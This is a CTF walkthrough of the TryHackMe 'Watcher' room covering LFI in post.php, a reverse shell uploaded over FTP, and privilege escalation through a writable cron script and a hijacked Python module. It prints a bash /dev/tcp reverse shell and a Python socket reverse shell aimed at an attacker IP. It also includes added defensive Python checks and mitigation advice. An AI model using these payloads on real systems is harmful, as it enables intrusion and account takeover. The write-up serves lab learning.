Watcher Write-up
Description
Watcher is a room on TryHackMe. It is a boot2root CTF of medium difficulty. In this room you have to collect 7 flags.
Enumeration
First of all we start with basic enumeration. We navigate to the web server on port 80. This web server contains a “robots.txt” file with two entries.
This will give you your first flag. We cannot read the “secret_file_do_not_read.txt” file directly. But the “post” parameter of the PHP script at “http://10.10.73.152/post.php” is prone to an LFI (local file inclusion). We can read the /etc/passwd file with that vulnerability.
Next we can read the secret file through the same LFI vulnerability by calling the URL “http://10.10.73.152/post.php?post=secret_file_do_not_read.txt”. The file contains FTP credentials, so now we know that FTP is also running on the target. We can assume that the FTP server is running on the standard port 21.
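The root cause of the two reads above is that post.php builds a file path from the raw “post” parameter. The following is an added example (not the room's post.php, which is PHP, and not part of this write-up) written in Python to show the check a defender would put in front of such an include: the parameter must match an allowlist of post names, and the resolved path must still sit inside the posts directory. The web root, the post names and the secret file are constructed for the demo.

```python
"""Allowlist-based resolution of a user-supplied 'post' parameter.

Added example, not the room's own post.php. Paths and file names are
constructed so the check can be exercised offline.
"""
import os
import tempfile

# Hypothetical allowlist of article files the page is allowed to include.
POSTS = {"post1.php", "post2.php"}


def make_demo_site():
    """Create a throwaway web root with a posts/ directory and a secret
    note one level above it, mirroring the room's layout."""
    root = tempfile.mkdtemp(prefix="watcher_demo_")
    posts = os.path.join(root, "posts")
    os.mkdir(posts)
    for name in POSTS:
        with open(os.path.join(posts, name), "w") as f:
            f.write("<p>constructed post %s</p>\n" % name)
    with open(os.path.join(root, "secret_file_do_not_read.txt"), "w") as f:
        f.write("constructed secret\n")
    return root


def resolve_post(root, requested):
    """Return the absolute path for `requested` only if it is an
    allowlisted file name and the resolved path stays inside root/posts.
    Raises ValueError otherwise, so the caller never includes the file."""
    # 1. Exact allowlist match: traversal sequences and absolute paths
    #    such as /etc/passwd can never match a bare file name.
    if requested not in POSTS:
        raise ValueError("post not in allowlist: %r" % requested)
    posts_dir = os.path.realpath(os.path.join(root, "posts"))
    # 2. Defence in depth: even an allowlisted name must resolve under
    #    posts/ (guards against a symlink dropped into the directory).
    full = os.path.realpath(os.path.join(posts_dir, requested))
    if os.path.commonpath([full, posts_dir]) != posts_dir:
        raise ValueError("resolved path escapes posts dir: %r" % full)
    return full


def try_request(root, requested):
    """Mimic the request handler: True if the file would be served."""
    try:
        resolve_post(root, requested)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    site = make_demo_site()
    for req in ["post1.php", "../secret_file_do_not_read.txt",
                "/etc/passwd", "/home/ftpuser/ftp/files/shell.php"]:
        state = "served" if try_request(site, req) else "rejected"
        print("%-45s -> %s" % (req, state))
```

Because the allowlist is checked before any path is built, the parameter can never name the secret note, /etc/passwd, or an uploaded file in the FTP directory; the realpath check is a second line of defence in case a symlink lands inside posts/.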
After connecting to the FTP server with ftp 10.10.73.152 we see a directory called “files” and a second flag. Inside the “files” directory we have write access.
Initial Access
We can now upload a reverse shell into that directory. I have used the reverse shell from Pentestmonkey.
Next, start a netcat listener with the command nc -lvnp 1234. From the previous note, we know that the FTP directory is located at /home/ftpuser/ftp/. So if we call the URL “http://10.10.73.152/post.php?post=/home/ftpuser/ftp/files/shell.php”, the web server will run the code and we will get a reverse shell.
Now we are on the machine as the www-data user. As www-data we can read the third flag, which is located at /var/www/html/more_secrets_a9f10a/flag_3.txt.
Privilege Escalation
During enumeration we can see that we can run all commands as the toby user if we use sudo.
Now we can elevate our privileges to toby by running the command sudo -u toby /bin/bash. After enumerating more, we can spot an interesting cronjob. The script at /home/toby/jobs/cow.sh is run as the mat user every minute.
Luckily we have write privileges to that file. This means we can place a reverse shell into that file and elevate our privileges to mat. Write the following two lines into that file. You can use the echo command for this.
#!/bin/bash
bash -i >& /dev/tcp/YOUR_MACHINE_IP/8080 0>&1
Next, start a Netcat listener on your machine and wait until the mat user connects to you.
Inside mat’s home folder we can read the fifth flag and find this note.
As you can see, we can run the script at /home/mat/scripts/will_script.py as the will user. That Python script calls a function from another script called cmd.py.
We have write privileges for the cmd.py file.
So we can craft the following malicious Python script on our attacker machine and replace the original cmd.py by transferring it to the victim.
def get_command(num):
    import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_MACHINE_IP",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])
    if(num == "1"):
        return "ls -lah"
    if(num == "2"):
        return "id"
    if(num == "3"):
        return "cat /etc/passwd"
In the next step we will need to run another Netcat listener on port 1234 on our attacker machine. Finally, execute the malicious script by running sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py. After that you should get a shell as the will user. During enumeration as the will user we can find an interesting directory at /opt/backup. It contains a file called “key.b64”, which holds base64 encoded data.
We can copy that file to our machine and decode it. You can use the command base64 -d key.b64 > sshkey. This is an SSH key, which we can use to log in as root. First change the permissions with chmod 600 sshkey. After that, log in as root with the command ssh -i sshkey root@10.10.73.152.
Mitigation
First of all, a filter should be used to fix the LFI vulnerability. Furthermore, no secret notes should be accessible through a public web server. The file permissions are also set incorrectly and should be fixed. It is also recommended that backups be encrypted.
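Both privilege escalation steps in this room follow one pattern: a script is run as one user (by cron or via sudo) while a less privileged user can modify it, or a Python module imported next to it. The following is an added example, not part of the write-up or the room, of the audit a defender would run over such scripts. It flags a script, its directory, and (for Python) any sibling .py module that is group- or world-writable or owned by someone other than root or the run-as user. The job layout and file modes are constructed for the demo.

```python
"""Audit of scripts that cron or sudo runs as another user.

Added example, not part of the original write-up or the room. Paths
used in the demo are constructed to mirror cow.sh and cmd.py.
"""
import os
import stat
import tempfile


def unsafe_reasons(st_mode, st_uid, run_uid):
    """Reasons a file with these stat fields must not be executed (or
    imported) as run_uid: only root and run_uid itself should be able
    to write it, and group/world write bits hand control to others."""
    reasons = []
    if st_uid not in (0, run_uid):
        reasons.append("owned by uid %d, not root or uid %d" % (st_uid, run_uid))
    if st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def audit_script(path, run_uid):
    """Audit `path`, which a cron job or sudo rule runs as run_uid.

    Checks the script, its directory (a writable directory lets anyone
    replace the file) and, for Python scripts, every sibling .py module,
    because `import cmd` resolves against the script's own directory
    first. Returns a list of findings; an empty list means all clear."""
    path = os.path.realpath(path)
    directory = os.path.dirname(path)
    targets = [path, directory]
    if path.endswith(".py"):
        targets += [os.path.join(directory, n) for n in sorted(os.listdir(directory))
                    if n.endswith(".py") and os.path.join(directory, n) != path]
    findings = []
    for p in targets:
        st = os.stat(p)
        for reason in unsafe_reasons(st.st_mode, st.st_uid, run_uid):
            findings.append("%s: %s" % (p, reason))
    return findings


def make_demo_jobs():
    """Constructed layout mirroring the room: a cron script plus a Python
    script with a helper module beside it, all mode 0644 and owned by
    the current user. Returns (dir, cow, will, cmd)."""
    d = tempfile.mkdtemp(prefix="audit_demo_")   # mkdtemp gives mode 0700
    cow = os.path.join(d, "cow.sh")
    will = os.path.join(d, "will_script.py")
    cmd = os.path.join(d, "cmd.py")
    for p, body in ((cow, "#!/bin/bash\necho moo\n"),
                    (will, "import cmd\nprint(cmd.get_command('1'))\n"),
                    (cmd, "def get_command(num):\n    return 'id'\n")):
        with open(p, "w") as f:
            f.write(body)
        os.chmod(p, 0o644)
    return d, cow, will, cmd


def current_uid():
    """Run-as user for the demo: the user executing this script."""
    return os.getuid()


def set_mode(path, mode):
    """Helper so the demo can loosen permissions the way the room does."""
    os.chmod(path, mode)


if __name__ == "__main__":
    me = current_uid()
    d, cow, will, cmd = make_demo_jobs()
    print("clean:", audit_script(cow, me))
    set_mode(cow, 0o664)            # group-writable cron script
    print("cow.sh:", audit_script(cow, me))
    set_mode(cmd, 0o666)            # helper module writable by everyone
    print("will_script.py:", audit_script(will, me))
```

Running this against /home/toby/jobs/cow.sh with mat's uid, and against /home/mat/scripts/will_script.py with will's uid, would have reported the writable script and the writable cmd.py module before either could be abused; the fix is the one the mitigation paragraph asks for, namely root or the run-as user owning these files with mode 0644 or tighter.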